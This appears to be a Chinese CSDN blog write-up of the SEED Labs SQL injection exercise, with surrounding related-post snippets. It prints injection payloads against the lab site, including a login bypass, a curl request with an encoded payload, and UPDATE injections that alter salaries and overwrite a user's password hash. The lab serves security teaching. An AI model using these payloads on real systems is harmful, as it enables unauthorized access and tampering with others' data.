SEED _LABS_SQLInjection

最新推荐文章于 2022-02-02 23:24:05 发布
最新推荐文章于 2022-02-02 23:24:05 发布
阅读量628 收藏 5
点赞数 1
文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44046197/article/details/117455330
版权

1.Overview

2.Lab Environment
Virtual machine
虚拟机中访问:
在这里插入图片描述
Physical machine
物理机中访问方法:
在这里插入图片描述
添加DNS解析
在这里插入图片描述
在这里插入图片描述

Apache configuration
无需配置

3.Lab Tasks
在这里插入图片描述

3.1 Task 1: Get Familiar with SQL Statement
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3.2 Task 2: SQL Injection Attack on SELECT Statement
在这里插入图片描述
在这里插入图片描述

Task 2.1: SQL Injection Attack from webpage.

构造注入语句:	Admin’; #

在这里插入图片描述

在这里插入图片描述

Task 2.2: SQL Injection from command line.
获取url编码后的注入代码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

获取目标url:http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin&Password=

根据URL编码构造注入核心代码:admin%27%3B%23

构造语句: http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23&Password=
     或   http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23

终端中发送http请求:curl ‘http://www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%3B%23&Password=

在这里插入图片描述
在这里插入图片描述
创建一个txt文档
在这里插入图片描述
修改为html文件
在这里插入图片描述
用浏览器打开
在这里插入图片描述

Task 2.3: Append a new SQL statement.

构造注入语句:	Alice';update credential set name=Alic where ID=1;#

在这里插入图片描述
在这里插入图片描述

Alice' and update credential set name=Alic where ID=1;#

3.3 Task 3: SQL Injection Attack on UPDATE Statement.
在这里插入图片描述

Task 3.1: Modify your own salary.
在这里插入图片描述
打开alice的修改界面
在这里插入图片描述
根据数据库中她的ID=1
在这里插入图片描述

构造注入语句:	',salary='1' where ID=1;#

在这里插入图片描述
修改成功
在这里插入图片描述

Task 3.2: Modify other people’s salary
先查看Boby的薪水
在这里插入图片描述
在这里插入图片描述

构造注入语句',salary='2’ where ID=2;#

在alice的编辑页面进行注入
在这里插入图片描述
注入后使用
boby';#
登陆并查看boby的薪水
在这里插入图片描述

Task 3.3: Modify other people’s password
SEEDlabs SQLInjection采用的是sha1hash加密用户密码
在这里插入图片描述

在这里插入图片描述

',Password='40bd001563085fc35165329ea1ff5c5ecbdbbeef’ where ID=1;#

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.4 Task 4: Countermeasure-Prepared Statement

4. Guidelines

5. Submission

卦象先生
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SeedLabs-Web安全-SQL注入实验
Anonymity
06-16 2484
SeedLabs-Web安全-SQL注入实验 文章目录SeedLabs-Web安全-SQL注入实验前言一、Task1 熟悉SQL语句1. 进入容器内部2.使用基本的SQL语句二、Task2 SQL注入攻击之select2.1 网页SQL注入攻击。2.2 来自命令行的SQL注入攻击。2.3 添加一条新的SQL语句。三、SQL注入攻击之UPDATE3.1 修改自己的薪水。3.2 修改他人工资四、Countermeasure — Prepared Statement 前言 SQL注入的实验记录,基本的不做赘
SeedLab——SQL Injection Attack Lab
Aft3rGl0w的博客
01-14 861
这里的密码是经过SHA1散列计算后存入数据库的,因此要修改别人的密码,不能直接修改为明文,那样我们自己也无法使用。上面的SELECT语句存在SQL注入漏洞,可能会造成数据库的泄露,如果UPDATE语句存在SQL注入漏洞,危害可能会更严重,因为攻击者可以利用漏洞来修改数据库,造成系统的不可用。获取用户提交的GET参数中获取用户名和密码,然后对密码计算sha1散列值,拼接到sql语句执行查询,以完成身份的校验。我们可以构造输入的用户名,将整个语句提前闭合,并将后面的内容注释掉,如下所示。的话命令格式比较简单。
SEED-Lab)SQL Injection Attack Lab SQL注入实验
lunan的博客
02-02 4672
(SEED-Lab)SQL Injection Attack Lab SQL注入实验 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2 Lab Environment2.1 Apache Confifiguration3 Lab Tasks3.1 Task 1: Get Familiar with SQL Statements3.2 Task 2: SQL Injection Attack on SELECT Statement3.
SEED Labs 2.0】SQL Injection Attack Lab
Chenyang的博客
08-25 5418
本文为 SEED Labs 2.0 - SQL Injection Attack Lab 的实验记录。 实验原理 SQL注入攻击通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,它目前是黑客对数据库进行攻击的最常用手段之一。 Task 1: Get Familiar with SQL Statements 启动 docker dcbuild dcup 然后进入 mysql 程序 dockps docksh ** mysql -
seedlab实验——SQL注入攻击
Yang254176的博客
07-24 1829
一、实验目的 通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施, 加强对Web攻击的防范。 二、实验原理 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。简单的说就是在post/ge
labsql.rar_LabVIEW SQL_SQL labview_labs_labview LabSQL_labview
07-14
labview中使用SQL数据库的演示,已经通过测试
SEED_Labs__为计算机安全教育开发的动手实验.pdf
08-08
动机 目的 在世界范围的采用情况 在中国的使用情况 实验环境 如何使用实验环境 实验分成六类 网络安全类 每个实验的网页 漏洞和攻击类 探索类 ...教师培训(美国自然科学基金赞助) ...当前和将来的研发
FreeRTOS_Labs_v.202009.00
10-11
官网下载的,官网速度可能慢一些...FreeRTOS_Labs_v.202009.00 FreeRTOS Labs Contains source code and example projects for the FreeRTOS Labs projects. The most up to date source code is available on Github.
SVV_Labs.tar
07-13
SVV_Labs.tar
DE2_labs_verilog
01-01
DE2_labs_verilog 试验参考书
SeedLabs-Web安全-SQL注入Problem
Anonymity
06-15 789
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录系列文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例
软件安全实验——lab8(SQL注入)(下)(旧虚拟机SEEDUbuntu12.04版本实验)
Onlyone_1314的博客
08-09 1285
目录标题2、实验室环境2.1环境配置2.2关闭对策2.3通过修补已有虚拟机,添加Web应用3、实验室的任务3.1任务1:MysQL控制台3.2任务2:针对SELECT语句的SQL注入攻击任务2.1(1)在不知道任何员工凭证的情况下,登陆应用程序(2)隔断的方式登录admin账户(3)#注释代码的方式登录admin账户任务2.2任务2.33.3任务3:针对UPDATE语句的SQL注入攻击任务3.1任务3.23.4任务4:对策-准备声明 2、实验室环境 您需要为这个实验室使用我们提供的虚拟机映像。支持这个实验
从入门到入土:[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图
Q_U_A_R_T_E_R的博客
10-26 3688
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 [SEED-Lab]-SQL注入攻击实验环境环境配置apachePDF文件实验 实验环境 seed-ubuntu 20.04 seed自带虚拟机已经安装好了mysql服务,root密码是seedubuntu 实验室环境。该实验室已经在我们预构建的Ubuntu16.04VM上进行
信息安全 SEED Lab9 SQL Injection Attack Lab
crazyliu的博客
06-27 2906
这个实验主要是尝试以下SQL注入。由于整个实验过程要用到网站,这里先配置一下。 网站部署在本地,且用域名访问,所以我们需要现在 /etc/hosts文件中设置域名到 IP 的映射关系。内容如下: 127.0.0.1 www.SeedLabSQLInjection.com 网站使用Apache作为服务器,在 /etc/apache2/sites-available/000-default.conf配置一下网站主目录,内容如下: <VirtualHost *:80> S
软件安全实验——lab8(SQL注入)(上)(旧虚拟机seedubuntu9版本实验)
Onlyone_1314的博客
08-09 499
这里写目录标题一级目录2、实验室环境2.1环境配置2.2关闭对策3、实验室的任务3.1 Task 1(30分):针对SELECT语句的SQL注入攻击3.2 Task 2(30分): SQL注入的UPDATE语句3.3 Task 3 (40 Points):对策任务3.3.1任务3.3.2任务3.3.3任务3.3.4 一级目录 2、实验室环境 您需要为这个实验室使用我们提供的虚拟机映像。支持这个实验室的虚拟机映像的名称为seedubuntu9 -August -2010,它是在2010年8月构建的。如果您碰
Collabtive系统SQL注入实验
weixin_34088583的博客
04-23 206
2019独角兽企业重金招聘Python工程师标准>>> ...
20169219 SEED SQL注入实验
weixin_30680385的博客
05-22 658
实验环境SEED Ubuntu镜像 环境配置 实验需要三样东西,Firefox、apache、phpBB2(镜像中已有): 1、运行Apache Server:只需运行命令sudo service apache2 start 2、phpBB2 web应用:镜像已经安装,通过http://www.sqllabmysqlphpbb.com访问,应用程序源代码位于/var/www/SQL/SQLLabM...
SEED Labs信息安全实验
热门推荐
红蓝联盟的博客
07-04 1万+
1.1  SEED Labs 介绍    SEED Labs是一套完整的信息安全实验,涵盖本科信息安全教学中的大部分基本原理,可用于提高学生体验式学习的实验室练习。项目组2002年由杜文亮教授创建,目前开发了30个实验,涵盖了各种计算机安全概念,原理和实践,几百所大学已采用。实验楼翻译制作的SEEDLabs在线实验课永久免费并开源。    SEED Labs网站:http://www.cis.sy...
sqli_labs安装
最新发布
04-13
sqli_labs是一个用于学习和实践SQL注入的实验环境。下面是sqli_labs的安装步骤: 1. 首先,你需要在你的机器上安装一个Web服务器,比如Apache或Nginx,并确保它正常运行。 2. 下载sqli_labs的源代码。你可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值